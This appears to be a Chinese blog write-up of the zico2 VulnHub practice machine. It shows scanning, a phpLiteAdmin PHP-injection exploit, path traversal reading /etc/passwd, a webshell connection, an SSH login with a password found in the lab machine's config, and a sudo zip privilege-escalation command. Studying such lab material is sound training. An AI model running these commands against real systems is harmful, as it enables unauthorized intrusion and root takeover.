渗透测试靶机:zico2

最新推荐文章于 2024-04-25 19:10:33 发布
最新推荐文章于 2024-04-25 19:10:33 发布
阅读量302 收藏 3
点赞数 1
文章标签: 安全 笔记 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70830611/article/details/137109661
版权

先扫描下端口

arp-scan -l

image-20240328132804991

 nmap -sV -sC -A -p- 192.168.2.204

image-20240328132933140

扫描下目录

dirb http://192.168.2.204

image-20240328132959073

访问下搜到的dbadmin

用弱口令admin登录,发现是一个SQLite数据库管理工具

搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞

image-20240328133304221

选择了24404.txt

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php

根据给的提示信息,先创建一个数据库.

存在文件包含漏洞

http://192.168.2.204/view.php?page=../../../../etc/passwd
http://192.168.2.204/view.php?page=../../../usr/databases/hack.php

image-20240328133045204

使用蚁剑连接

进入zico家目录后,发现了wordpress目录,进去发现有一个wp-config.php文件可以查看数据库账号密码
密码为sWfCsfJSPV9H3AmQzw8,尝试ssh登录

ssh zico@192.168.2.119
sWfCsfJSPV9H3AmQzw8
sudo zip /tmp/1.zip /home/zico/to_do.txt -T --unzip-command="sh -c /bin/bash"

image-20240328133633559

benben-xu
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
靶机实战-zico
滕财然的博客
01-19 1071
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到一个有用的: 链接后面有?page= tools.htm...
靶机测试-zico
ximo的博客
03-06 322
目信息收集主机发现端口扫描探测CMS目录扫描漏洞发现漏洞利用提权总结 信息收集 主机发现 nmap -sV 目标IP地址为192.168.133.134. 端口扫描 利用masscan: masscan --rate=10000 --port 0-65535 192.168.133.134 使用nmap探测版本等信息: 探测CMS 使用whatweb: 目录扫描 漏洞发现 发现此页面的url中page变量的值为一个html文件,直接访问tools.html: 可以直接访问,猜测使用了
kali渗透综合靶机(五)--zico2靶机
W小哥
03-10 1227
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、node1靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
靶机精讲:ZICO_2 靶机 writeup
weixin_72368277的博客
07-02 160
zico_2有趣的斯口子,确定吧来看看?
学习渗透日记6 靶机zico2实战
qq_56902810的博客
05-02 244
zico2靶机实战全过程
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3129
Vulnhub-Zico2靶机实战
zico2靶机练习
weixin_71090536的博客
08-04 209
下方实操中,使用到 攻击机 Kali 和 靶机 zico2两台机器均开启 NAT 模式,比较方便快速扫描。
入门靶机渗透之zico2
Yaphst的博客
03-08 5772
靶场介绍 靶机下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后配置网卡,确保与自己的攻击机在同一网段,然后开启虚拟机。 Zico 正在尝试建立他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。 在尝试了一些流行的CMS之后,他决定建立自己的。 这是个好主意吗? 目标:拿到root权限,获取flag 信息收集 打开kali,查看kali的IP地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.134是靶机
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1054
渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
DC-4-Web渗透测试靶机
01-19
DC-4
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 933
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
网站被SmartScreen标记为不安全怎么办?
Racent_Y的博客
04-22 595
在互联网时代,网站的安全性和可信度是用户选择是否继续访问的重要因素之一,然而,网站运营者偶尔会发现使用Edge浏览器访问网站时,会出现Microsoft Defender SmartScreen(以下简称SmartScreen)提示网站不安全的情况。旨在通过以上措施,尽可能的减少网站被SmartScreen标记为不安全的可能,让网站可以正常显示,从而使用户重新建立起对网站的信任,提高用户访问量和浏览量。这里的服务器证书指的就是可以实现网站HTTPS的SSL证书,且要使用在有效期内的。
第67天:APP攻防-Frida反证书抓包&移动安全系统&资产提取&评估扫描
weixin_71529930的博客
04-23 1193
移动安全框架 (MobSF) 是一种自动化的一体化移动应用程序(Android/iOS/Windows) 渗透测试、恶意软件分析和安全评估框架,能够执行静态和动态分析。AppinfoScanner 一款适用于以 HW 行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态 WEB 站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
安全运营之通行字管理
最新发布
学而思(xiejava的blog)
04-25 626
安全管理所指的通行字指的是对用于身份验证的账号密码或口令的管理。在计算机系统、网络服务、数据库管理等领域,通行字(或称账号口令、密码)是用于验证用户身份的重要机制。通行字管理的核心目标是确保只有授权用户才能访问系统资源,同时保护敏感信息不被未授权访问。通行字除了自然人登录信息系统时所必需的用于鉴别登录者身份和权限信息的账号和口令外,还包括信息系统软件之间互相调用数据所需的账号和口令。
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值